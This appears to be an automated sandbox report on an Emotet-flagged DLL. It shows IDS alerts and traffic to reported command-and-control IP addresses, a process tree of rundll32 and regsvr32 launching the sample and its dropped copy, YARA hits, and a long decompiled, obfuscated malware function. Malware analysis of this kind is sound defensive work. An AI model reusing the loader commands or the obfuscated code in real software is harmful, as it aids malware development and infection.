Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/14/22-19:33:26.871063	TCP	2404332	ET CNC Feodo Tracker Reported CnC Server TCP group 17	49727	80	192.168.2.6	45.138.98.34
01/14/22-19:33:28.093726	TCP	2404338	ET CNC Feodo Tracker Reported CnC Server TCP group 20	49728	8080	192.168.2.6	69.16.218.101

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2022 19:33:26.871062994 CET	49727	80	192.168.2.6	45.138.98.34
Jan 14, 2022 19:33:26.888017893 CET	80	49727	45.138.98.34	192.168.2.6
Jan 14, 2022 19:33:27.448160887 CET	49727	80	192.168.2.6	45.138.98.34
Jan 14, 2022 19:33:27.464992046 CET	80	49727	45.138.98.34	192.168.2.6
Jan 14, 2022 19:33:28.057630062 CET	49727	80	192.168.2.6	45.138.98.34
Jan 14, 2022 19:33:28.074462891 CET	80	49727	45.138.98.34	192.168.2.6
Jan 14, 2022 19:33:28.093725920 CET	49728	8080	192.168.2.6	69.16.218.101
Jan 14, 2022 19:33:28.225497007 CET	8080	49728	69.16.218.101	192.168.2.6
Jan 14, 2022 19:33:28.225686073 CET	49728	8080	192.168.2.6	69.16.218.101
Jan 14, 2022 19:33:28.237102032 CET	49728	8080	192.168.2.6	69.16.218.101
Jan 14, 2022 19:33:28.368968964 CET	8080	49728	69.16.218.101	192.168.2.6
Jan 14, 2022 19:33:28.382062912 CET	8080	49728	69.16.218.101	192.168.2.6
Jan 14, 2022 19:33:28.382083893 CET	8080	49728	69.16.218.101	192.168.2.6
Jan 14, 2022 19:33:28.382231951 CET	49728	8080	192.168.2.6	69.16.218.101
Jan 14, 2022 19:33:33.340940952 CET	49728	8080	192.168.2.6	69.16.218.101
Jan 14, 2022 19:33:33.473445892 CET	8080	49728	69.16.218.101	192.168.2.6
Jan 14, 2022 19:33:33.473906040 CET	8080	49728	69.16.218.101	192.168.2.6
Jan 14, 2022 19:33:33.474018097 CET	49728	8080	192.168.2.6	69.16.218.101
Jan 14, 2022 19:33:33.479451895 CET	49728	8080	192.168.2.6	69.16.218.101
Jan 14, 2022 19:33:33.611426115 CET	8080	49728	69.16.218.101	192.168.2.6
Jan 14, 2022 19:33:34.131900072 CET	8080	49728	69.16.218.101	192.168.2.6
Jan 14, 2022 19:33:34.132272005 CET	49728	8080	192.168.2.6	69.16.218.101
Jan 14, 2022 19:33:37.128568888 CET	8080	49728	69.16.218.101	192.168.2.6
Jan 14, 2022 19:33:37.128607035 CET	8080	49728	69.16.218.101	192.168.2.6
Jan 14, 2022 19:33:37.128669977 CET	49728	8080	192.168.2.6	69.16.218.101
Jan 14, 2022 19:33:37.128705978 CET	49728	8080	192.168.2.6	69.16.218.101
Jan 14, 2022 19:35:16.864855051 CET	49728	8080	192.168.2.6	69.16.218.101
Jan 14, 2022 19:35:16.864906073 CET	49728	8080	192.168.2.6	69.16.218.101

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6764 Parent PID: 1864

General

Start time:	19:32:45
Start date:	14/01/2022
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll"
Imagebase:	0xb80000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.378920575.0000000000B50000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.380234706.0000000000B50000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.380280063.0000000000D31000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.403315549.0000000000B50000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.379032722.0000000000D31000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 4616 Parent PID: 6764

General

Start time:	19:32:46
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5264 Parent PID: 560

General

Start time:	19:32:46
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 3408 Parent PID: 6764

General

Start time:	19:32:46
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\ALNgwfVtrB.dll
Imagebase:	0xf0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.421593787.0000000004051000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.421559907.0000000004020000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6048 Parent PID: 4616

General

Start time:	19:32:46
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",#1
Imagebase:	0x8b0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.377076576.00000000046D1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.376980438.00000000046A0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6800 Parent PID: 6764

General

Start time:	19:32:46
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\ALNgwfVtrB.dll,DllRegisterServer
Imagebase:	0x8b0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.425302680.00000000054F1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.424744123.00000000033B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.425412117.0000000005600000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.425380885.00000000055D1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.425231298.00000000053C1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.425055302.0000000005200000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.425273355.00000000054C0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.425444879.0000000005631000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.424828975.0000000003661000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.425344500.00000000055A0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6980 Parent PID: 6048

General

Start time:	19:32:48
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",DllRegisterServer
Imagebase:	0x8b0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.388319825.0000000005640000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.388061342.00000000053B1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.388938400.0000000005A60000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.388421865.00000000056A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.388494502.00000000056D1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.388374896.0000000005671000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.388137915.0000000005460000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.388743358.0000000005900000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.387667842.0000000004E61000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.387995858.0000000005380000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.389038479.0000000005A91000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.388835673.0000000005931000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.387132452.00000000033D0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.388209292.0000000005491000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 4588 Parent PID: 560

General

Start time:	19:32:52
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 4680 Parent PID: 4588

General

Start time:	19:32:52
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 164 -p 6764 -ip 6764
Imagebase:	0x1150000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 6496 Parent PID: 6764

General

Start time:	19:32:54
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6764 -s 528
Imagebase:	0x1150000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 4668 Parent PID: 6980

General

Start time:	19:32:55
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mhgwckn\ikgetkts.aey",QTEnBIyMIuE
Imagebase:	0x8b0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.390300102.0000000004A11000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.389941280.0000000003080000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 4584 Parent PID: 4668

General

Start time:	19:32:57
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mhgwckn\ikgetkts.aey",DllRegisterServer
Imagebase:	0x8b0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 5688 Parent PID: 560

General

Start time:	19:33:07
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 400 Parent PID: 3408

General

Start time:	19:33:12
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\ALNgwfVtrB.dll",DllRegisterServer
Imagebase:	0x8b0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 5796 Parent PID: 560

General

Start time:	19:33:29
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 4532 Parent PID: 560

General

Start time:	19:33:49
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 2932 Parent PID: 560

General

Start time:	19:33:57
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6764 Parent PID: 1864 loaddll32.exeCOMMON

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	55.8%
Total number of Nodes:	1073
Total number of Limit Nodes:	5

Executed Functions

Function 00D4EFDD, Relevance: 12.9, Strings: 10, Instructions: 360
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00D4EFDD() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed short* _t381;
				signed int _t393;
				signed int _t395;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t415;
				signed int* _t444;
				void* _t445;
				signed int _t449;
				signed int _t450;
				signed short* _t451;
				signed int* _t452;

				_t452 =  &_v1720;
				_v1648 = 0xf9e68a;
				_v1648 = _v1648 ^ 0xa89cfd85;
				_v1648 = _v1648 | 0xe1599fd2;
				_v1648 = _v1648 ^ 0xe97d9ff6;
				_v1592 = 0x52ca29;
				_v1592 = _v1592 + 0xa8c7;
				_v1592 = _v1592 ^ 0x005b0974;
				_v1632 = 0x5fd17f;
				_t397 = 0x55;
				_v1632 = _v1632 / _t397;
				_v1632 = _v1632 + 0x4a14;
				_t395 = 0;
				_v1632 = _v1632 ^ 0x0007d59d;
				_t445 = 0x5f4d19a;
				_v1584 = 0xb2803c;
				_t398 = 0x15;
				_v1584 = _v1584 / _t398;
				_v1584 = _v1584 ^ 0x0001d429;
				_v1700 = 0x18b17c;
				_v1700 = _v1700 >> 4;
				_v1700 = _v1700 << 0xb;
				_v1700 = _v1700 | 0x5bcbde76;
				_v1700 = _v1700 ^ 0x5fd8859a;
				_v1716 = 0x3ed9a0;
				_v1716 = _v1716 >> 2;
				_v1716 = _v1716 | 0xf2214935;
				_v1716 = _v1716 + 0xffff6098;
				_v1716 = _v1716 ^ 0xf2246cf7;
				_v1616 = 0xd3100b;
				_v1616 = _v1616 << 0xb;
				_v1616 = _v1616 ^ 0x988d1f7d;
				_v1576 = 0x49dab3;
				_t399 = 0x41;
				_v1576 = _v1576 / _t399;
				_v1576 = _v1576 ^ 0x00091b0c;
				_v1604 = 0x610b2e;
				_v1604 = _v1604 >> 3;
				_v1604 = _v1604 ^ 0x000d4028;
				_v1708 = 0x5e4148;
				_v1708 = _v1708 * 0x7c;
				_v1708 = _v1708 + 0x543c;
				_v1708 = _v1708 * 0x6e;
				_v1708 = _v1708 ^ 0x9e2c7101;
				_v1580 = 0x8fa7d1;
				_v1580 = _v1580 | 0x5a90bc2e;
				_v1580 = _v1580 ^ 0x5a99780a;
				_v1644 = 0xdfbfec;
				_v1644 = _v1644 ^ 0x5e27e596;
				_v1644 = _v1644 + 0xffff45c7;
				_v1644 = _v1644 ^ 0x5efb0694;
				_v1652 = 0xa5c8eb;
				_v1652 = _v1652 ^ 0x9b43bc99;
				_v1652 = _v1652 * 0x26;
				_v1652 = _v1652 ^ 0x243194e2;
				_v1596 = 0xb87d2a;
				_v1596 = _v1596 ^ 0x06815b6e;
				_v1596 = _v1596 ^ 0x0639024b;
				_v1568 = 0xf0e227;
				_v1568 = _v1568 * 0x3d;
				_v1568 = _v1568 ^ 0x396ce50f;
				_v1572 = 0x747c0d;
				_v1572 = _v1572 + 0xffffb798;
				_v1572 = _v1572 ^ 0x0071a7b9;
				_v1656 = 0x3795ed;
				_v1656 = _v1656 | 0xbce94746;
				_t400 = 0x26;
				_v1656 = _v1656 / _t400;
				_v1656 = _v1656 ^ 0x04ffd641;
				_v1628 = 0xc97098;
				_t401 = 0x3f;
				_v1628 = _v1628 / _t401;
				_v1628 = _v1628 << 2;
				_v1628 = _v1628 ^ 0x0000c1e6;
				_v1664 = 0x186675;
				_v1664 = _v1664 + 0x5979;
				_v1664 = _v1664 + 0xda5e;
				_v1664 = _v1664 ^ 0x0013e2ca;
				_v1672 = 0x37994d;
				_t402 = 0x3c;
				_v1672 = _v1672 / _t402;
				_v1672 = _v1672 << 6;
				_v1672 = _v1672 ^ 0x0033bfe5;
				_v1588 = 0x8a41f;
				_v1588 = _v1588 ^ 0x744a78fd;
				_v1588 = _v1588 ^ 0x744e2179;
				_v1720 = 0x535779;
				_v1720 = _v1720 << 0xd;
				_v1720 = _v1720 + 0x4332;
				_v1720 = _v1720 + 0x735f;
				_v1720 = _v1720 ^ 0x6aed3196;
				_v1692 = 0x449a24;
				_t403 = 0x7f;
				_v1692 = _v1692 / _t403;
				_v1692 = _v1692 >> 0xb;
				_v1692 = _v1692 | 0x1a1cc036;
				_v1692 = _v1692 ^ 0x1a141e74;
				_v1680 = 0xcbdb4c;
				_t404 = 0x32;
				_v1680 = _v1680 / _t404;
				_v1680 = _v1680 + 0xffff62cd;
				_v1680 = _v1680 ^ 0x0005b6c2;
				_v1712 = 0x490fe1;
				_v1712 = _v1712 + 0xffff5c72;
				_v1712 = _v1712 | 0x8d0799de;
				_v1712 = _v1712 + 0xd1c7;
				_v1712 = _v1712 ^ 0x8d59d7bd;
				_v1564 = 0xeb31a6;
				_v1564 = _v1564 + 0x9db9;
				_v1564 = _v1564 ^ 0x00ef2ed2;
				_v1636 = 0x2bc790;
				_v1636 = _v1636 << 0xd;
				_v1636 = _v1636 + 0xc361;
				_v1636 = _v1636 ^ 0x78fc9b03;
				_v1608 = 0x9c27ff;
				_t405 = 0x79;
				_v1608 = _v1608 / _t405;
				_v1608 = _v1608 ^ 0x00083646;
				_v1612 = 0x2811b5;
				_v1612 = _v1612 << 7;
				_v1612 = _v1612 ^ 0x140bb062;
				_v1704 = 0x10f563;
				_v1704 = _v1704 << 7;
				_v1704 = _v1704 + 0x8e91;
				_v1704 = _v1704 >> 1;
				_v1704 = _v1704 ^ 0x043150d1;
				_v1668 = 0xd17281;
				_v1668 = _v1668 + 0xffff6975;
				_v1668 = _v1668 * 5;
				_v1668 = _v1668 ^ 0x041d3199;
				_v1676 = 0x45cf94;
				_v1676 = _v1676 | 0xf5b6f9ff;
				_v1676 = _v1676 ^ 0xf5f7fea4;
				_v1640 = 0xed0f5a;
				_v1640 = _v1640 | 0x16dcab92;
				_v1640 = _v1640 ^ 0xea8ad617;
				_v1640 = _v1640 ^ 0xfc77378a;
				_v1684 = 0xfd4b0d;
				_v1684 = _v1684 ^ 0xf5deb09c;
				_v1684 = _v1684 * 0x14;
				_v1684 = _v1684 ^ 0x26c6ef50;
				_v1600 = 0xb07e76;
				_v1600 = _v1600 + 0x891d;
				_v1600 = _v1600 ^ 0x00bcbcf5;
				_v1660 = 0xdc9573;
				_v1660 = _v1660 | 0xf03871f4;
				_v1660 = _v1660 >> 9;
				_v1660 = _v1660 ^ 0x0071eac7;
				_v1620 = 0x8203d2;
				_v1620 = _v1620 ^ 0xa8466021;
				_v1620 = _v1620 ^ 0xa8c8da0e;
				_v1688 = 0x3e6237;
				_v1688 = _v1688 + 0x1a50;
				_v1688 = _v1688 >> 3;
				_t451 = _v1620;
				_v1688 = _v1688 * 0x2f;
				_v1688 = _v1688 ^ 0x0160f017;
				_v1696 = 0x29d1f1;
				_v1696 = _v1696 + 0xffffde63;
				_v1696 = _v1696 + 0xffff46cf;
				_v1696 = _v1696 * 0x14;
				_v1696 = _v1696 ^ 0x033cdd59;
				_v1624 = 0xc011c7;
				_v1624 = _v1624 + 0xffff119f;
				_v1624 = _v1624 >> 7;
				_v1624 = _v1624 ^ 0x00036cbb;
				while(_t445 != 0x2906f2f) {
					if(_t445 == 0x5f4d19a) {
						E00D4FE2A(_v1592, _v1632, 0x208,  &_v1560);
						_pop(_t405);
						_t445 = 0x2906f2f;
						continue;
					}
					if(_t445 == 0x6d37c50) {
						_t381 = _t451;
						__eflags =  *_t451 - _t395;
						if(__eflags == 0) {
							L17:
							_t445 = 0xfe0ac9e;
							continue;
						} else {
							goto L10;
						}
						do {
							L10:
							__eflags =  *_t381 - 0x2c;
							if( *_t381 != 0x2c) {
								goto L16;
							}
							_t444 =  &_v1560;
							while(1) {
								_t381 =  &(_t381[1]);
								_t415 =  *_t381 & 0x0000ffff;
								__eflags = _t415;
								if(_t415 == 0) {
									break;
								}
								__eflags = _t415 - 0x20;
								if(_t415 == 0x20) {
									break;
								}
								 *_t444 = _t415;
								_t444 =  &(_t444[0]);
								__eflags = _t444;
							}
							_t405 = 0;
							__eflags = 0;
							 *_t444 = 0;
							L16:
							_t381 =  &(_t381[1]);
							__eflags =  *_t381 - _t395;
						} while (__eflags != 0);
						goto L17;
					}
					if(_t445 == 0x88437ca) {
						E00D31A34(_v1572,  &_v1040, _t405, _t405, _v1656, _v1628, _v1664, _t405, _v1648, _v1672);
						E00D50DB1(_v1588,  &_v520, __eflags, _v1720, _v1572, _v1692);
						_push(_v1636);
						_push(_v1564);
						_push(_v1712);
						_t449 = E00D4E1F8(0xd31160, _v1680, __eflags);
						E00D52D0A(_v1612, __eflags,  &_v520, _v1704, _v1668, _v1676, 0xd31160, _t451,  &_v1040, _t449);
						_t405 = _t449;
						E00D4FECB(_t405, _v1640, _v1684, _v1600, _v1660);
						_t452 =  &(_t452[0x19]);
						_t445 = 0xc3a6a1c;
						continue;
					}
					if(_t445 == 0xc3a6a1c) {
						_push(_t405);
						E00D485FF(_v1620, _v1688, __eflags, _t395, _t451, _t395, _v1696, _t395, _v1624);
						_t395 = 1;
						__eflags = 1;
						L23:
						return _t395;
					}
					_t462 = _t445 - 0xfe0ac9e;
					if(_t445 == 0xfe0ac9e) {
						_push(_v1576);
						_push(_v1616);
						_push(_v1716);
						_t450 = E00D4E1F8(0xd31120, _v1700, _t462);
						_t393 = E00D5061D(_v1604, _t450,  &_v1560, _v1708, _v1580); // executed
						_t405 = _t450;
						asm("sbb edi, edi");
						_t445 = ( ~_t393 & 0x02221bd6) + 0x6621bf4;
						E00D4FECB(_t405, _v1644, _v1652, _v1596, _v1568);
						_t452 =  &(_t452[9]);
					}
					L20:
					if(_t445 != 0x6621bf4) {
						continue;
					}
					goto L23;
				}
				_t451 = E00D3C307();
				_t445 = 0x6d37c50;
				goto L20;
			}

0x00d4efdd
0x00d4efe3
0x00d4efed
0x00d4eff5
0x00d4effd
0x00d4f005
0x00d4f010
0x00d4f01b
0x00d4f026
0x00d4f038
0x00d4f03d
0x00d4f043
0x00d4f04b
0x00d4f04d
0x00d4f055
0x00d4f05a
0x00d4f06c
0x00d4f071
0x00d4f07a
0x00d4f085
0x00d4f08d
0x00d4f092
0x00d4f097
0x00d4f09f
0x00d4f0a7
0x00d4f0af
0x00d4f0b4
0x00d4f0bc
0x00d4f0c4
0x00d4f0cc
0x00d4f0d4
0x00d4f0d9
0x00d4f0e1
0x00d4f0f3
0x00d4f0f6
0x00d4f0fd
0x00d4f108
0x00d4f113
0x00d4f11b
0x00d4f126
0x00d4f133
0x00d4f137
0x00d4f144
0x00d4f148
0x00d4f150
0x00d4f15b
0x00d4f166
0x00d4f171
0x00d4f179
0x00d4f181
0x00d4f189
0x00d4f191
0x00d4f199
0x00d4f1a6
0x00d4f1aa
0x00d4f1b2
0x00d4f1bd
0x00d4f1c8
0x00d4f1d3
0x00d4f1e6
0x00d4f1ed
0x00d4f1f8
0x00d4f203
0x00d4f210
0x00d4f21b
0x00d4f223
0x00d4f231
0x00d4f236
0x00d4f23c
0x00d4f244
0x00d4f250
0x00d4f255
0x00d4f25b
0x00d4f260
0x00d4f268
0x00d4f270
0x00d4f278
0x00d4f280
0x00d4f288
0x00d4f294
0x00d4f299
0x00d4f29f
0x00d4f2a4
0x00d4f2ac
0x00d4f2b7
0x00d4f2c2
0x00d4f2cd
0x00d4f2d5
0x00d4f2da
0x00d4f2e2
0x00d4f2ea
0x00d4f2f2
0x00d4f2fe
0x00d4f303
0x00d4f309
0x00d4f30e
0x00d4f316
